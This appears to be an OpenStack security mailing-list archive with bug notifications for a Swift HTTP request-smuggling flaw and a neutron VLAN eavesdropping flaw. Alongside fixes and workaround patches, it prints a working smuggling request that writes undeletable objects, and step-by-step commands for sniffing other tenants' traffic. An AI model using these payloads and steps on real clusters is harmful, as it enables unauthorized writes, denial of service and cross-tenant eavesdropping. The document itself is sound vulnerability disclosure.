From 1840507 at bugs.launchpad.net Wed Oct 2 23:09:56 2019 From: 1840507 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 02 Oct 2019 23:09:56 -0000 Subject: [Openstack-security] [Bug 1840507] Re: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster References: <156599088351.26410.7391620144910796824.malonedeb@gac.canonical.com> Message-ID: <157005779668.31915.12084075468045263419.malone@wampee.canonical.com> Reviewed: https://review.opendev.org/684041 Committed: https://git.openstack.org/cgit/openstack/swift/commit/?id=bf9346d88de2aeb06da3b2cde62ffa6200936367 Submitter: Zuul Branch: master commit bf9346d88de2aeb06da3b2cde62ffa6200936367 Author: Tim Burke Date: Thu Aug 15 14:33:06 2019 -0700 Fix some request-smuggling vectors on py3 A Python 3 bug causes us to abort header parsing in some cases. We mostly worked around that in the related change, but that was *after* eventlet used the parsed headers to determine things like message framing. As a result, a client sending a malformed request (for example, sending both Content-Length *and* Transfer-Encoding: chunked headers) might have that request parsed properly and authorized by a proxy-server running Python 2, but the proxy-to-backend request could get misparsed if the backend is running Python 3. As a result, the single client request could be interpreted as multiple requests by an object server, only the first of which was properly authorized at the proxy. Now, after we find and parse additional headers that weren't parsed by Python, fix up eventlet's wsgi.input to reflect the message framing we expect given the complete set of headers. As an added precaution, if the client included Transfer-Encoding: chunked *and* a Content-Length, ensure that the Content-Length is not forwarded to the backend. Change-Id: I70c125df70b2a703de44662adc66f740cc79c7a9 Related-Change: I0f03c211f35a9a49e047a5718a9907b515ca88d7 Closes-Bug: 1840507 ** Changed in: swift Status: New => Fix Released -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840507 Title: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Bug description: Python 3 doesn't parse headers the same way as python 2 [1]. We attempt to address this failing [2], but since we're doing it at the application level, eventlet can still get confused about what should and should not be the request body.
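The proxy-side precaution in the commit message above follows RFC 7230, section 3.3.3: when a request carries both Transfer-Encoding: chunked and a Content-Length, chunked framing governs and the Content-Length must not be passed along. A minimal sketch of that idea (illustrative only, not the actual Swift patch; the plain dict of headers is an assumption made for the example):

    def sanitize_backend_headers(headers):
        # If the client supplied both framing mechanisms, keep only
        # Transfer-Encoding so a py3 backend cannot mis-frame the body
        # (RFC 7230 section 3.3.3, item 3).
        te = headers.get('Transfer-Encoding', '')
        if 'chunked' in te.lower():
            headers.pop('Content-Length', None)
        return headers

    # The smuggling request shown below would lose its Content-Length
    # before the proxy-to-backend request is built.
    backend = sanitize_backend_headers({'Transfer-Encoding': 'chunked',
                                        'Content-Length': '4'})
    assert 'Content-Length' not in backend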
Consider a client request like   PUT /v1/AUTH_test/c/o HTTP/1.1   Host: saio:8080   Content-Length: 4   Connection: close   X-Object-Meta-x-🌴: 👍   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Transfer-Encoding: chunked   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 A python 2 proxy-server will auth the user, add a bunch more headers, and send a request on to the object-servers like   PUT /sdb1/312/AUTH_test/c/o HTTP/1.1   Accept-Encoding: identity   Expect: 100-continue   X-Container-Device: sdb2   Content-Length: 4   X-Object-Meta-X-🌴: 👍   Connection: close   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Content-Type: application/octet-stream   X-Backend-Storage-Policy-Index: 1   X-Timestamp: 1565985475.83685   X-Container-Host: 127.0.0.1:6021   X-Container-Partition: 61   Host: saio:8080   User-Agent: proxy-server 3752   Referer: PUT http://saio:8080/v1/AUTH_test/c/o   Transfer-Encoding: chunked   X-Trans-Id: txef407697a8c1416c9cf2d-005d570ac3   X-Backend-Clean-Expiring-Object-Queue: f (Note that the exact order of the headers will vary but is significant; the above was obtained on my machine with PYTHONHASHSEED=1.) On a python 3 object-server, eventlet will only have seen the headers up to (and not including, though that doesn't really matter) the palm tree. Significantly, it sees `Content-Length: 4` (which, per the spec [3], the proxy-server ignored) and doesn't see either of `Connection: close` or `Transfer-Encoding: chunked`. The *application* gets all of the headers, though, so it responds   HTTP/1.1 100 Continue and the proxy sends the body:   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 Since eventlet thinks the request body is only four bytes, swift writes down b'aa\r\n' for AUTH_test/c/o. Since eventlet didn't see the `Connection: close` header, it looks for and processes more requests on the socket, and swift writes a second object:   $ swift-object-info /srv/node1/sdb1/objects-1/0/*/*/9999999999.99999_ffffffffffffffff.data   Path: /DUDE_u/r/pwned     Account: DUDE_u     Container: r     Object: pwned     Object hash: b05097e51f8700a3f5a29d93eb2941f2   Content-Type: text/evil   Timestamp: 2286-11-20T17:46:39.999990 (9999999999.99999_ffffffffffffffff)   System Metadata:     No metadata found   Transient System Metadata:     No metadata found   User Metadata:     No metadata found   Other Metadata:     No metadata found   ETag: 4034a346ccee15292d823416f7510a2f (valid)   Content-Length: 4 (valid)   Partition 705   Hash b05097e51f8700a3f5a29d93eb2941f2   ... There are a few things worth noting at this point: 1. This was for a replicated policy with encryption not enabled.    Having encryption enabled would mitigate this as the attack    payload would be encrypted; using an erasure-coded policy would    complicate the attack, but I believe most EC schemes would still    be vulnerable. 2. An attacker would need to know (or be able to guess) a device    name (such as "sdb1" above) used by one of the backend nodes. 3. Swift doesn't know how to delete this data -- the X-Timestamp    used was the maximum valid value, so no tombstone can be    written over it [4]. 4. The account and container may not actually exist; it doesn't    really matter as no container update is sent. 
As a result, the data written cannot easily be found or tracked. 5. A small payload was used for the demonstration, but it should be fairly trivial to craft a larger one; this has potential as a DoS attack on a cluster by filling its disks. The fix should involve at least two things: First, after re-parsing headers, servers should make appropriate adjustments to environ['wsgi.input'] to ensure that it has all relevant information about the request body. Second, the proxy should not include a Content-Length header when sending a chunk-encoded request to the backend. [1] https://bugs.python.org/issue37093 [2] https://github.com/openstack/swift/commit/76fde8926 [3] https://tools.ietf.org/html/rfc7230#section-3.3.3 item 3 [4] https://github.com/openstack/swift/commit/f581fccf7 To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1840507/+subscriptions From 1734320 at bugs.launchpad.net Thu Oct 3 08:03:02 2019 From: 1734320 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 03 Oct 2019 08:03:02 -0000 Subject: [Openstack-security] [Bug 1734320] Fix proposed to neutron (stable/rocky) References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157008978228.31991.783321841512001254.malone@wampee.canonical.com> Fix proposed to branch: stable/rocky Review: https://review.opendev.org/686345 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports that are administratively down, even between tenants' self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state; don't leave them dangling in trunk mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait to finish the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down.
It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. 
Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, 
iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From 1734320 at bugs.launchpad.net Thu Oct 3 08:15:10 2019 From: 1734320 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 03 Oct 2019 08:15:10 -0000 Subject: [Openstack-security] [Bug 1734320] Fix proposed to neutron (stable/queens) References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157009051028.31991.3832865490035166401.malone@wampee.canonical.com> Fix proposed to branch: stable/queens Review: https://review.opendev.org/686346 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. 
If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. 
Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. 
Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 
'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From 1734320 at bugs.launchpad.net Thu Oct 3 08:20:12 2019 From: 1734320 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 03 Oct 2019 08:20:12 -0000 Subject: [Openstack-security] [Bug 1734320] Fix proposed to neutron (stable/pike) References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157009081243.16450.14118186781274603010.malone@gac.canonical.com> Fix proposed to branch: stable/pike Review: https://review.opendev.org/686347 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. 
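The dangerous state described above is simply a qvo port left on the integration bridge with no VLAN tag. A hedged operator-side check for that state, based on the ovs-vsctl output shown in the reproduction steps (standard ovs-vsctl commands are assumed; verify them against your own deployment):

    import subprocess

    def find_untagged_vif_ports(bridge='br-int'):
        # Ports left untagged on the integration bridge behave as trunk
        # ports and can see every tenant VLAN on the compute node.
        ports = subprocess.check_output(
            ['ovs-vsctl', 'list-ports', bridge]).decode().split()
        suspects = []
        for name in ports:
            if not name.startswith('qvo'):
                continue
            tag = subprocess.check_output(
                ['ovs-vsctl', 'get', 'Port', name, 'tag']).decode().strip()
            if tag == '[]':  # an unset tag prints as the empty set
                suspects.append(name)
        return suspects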
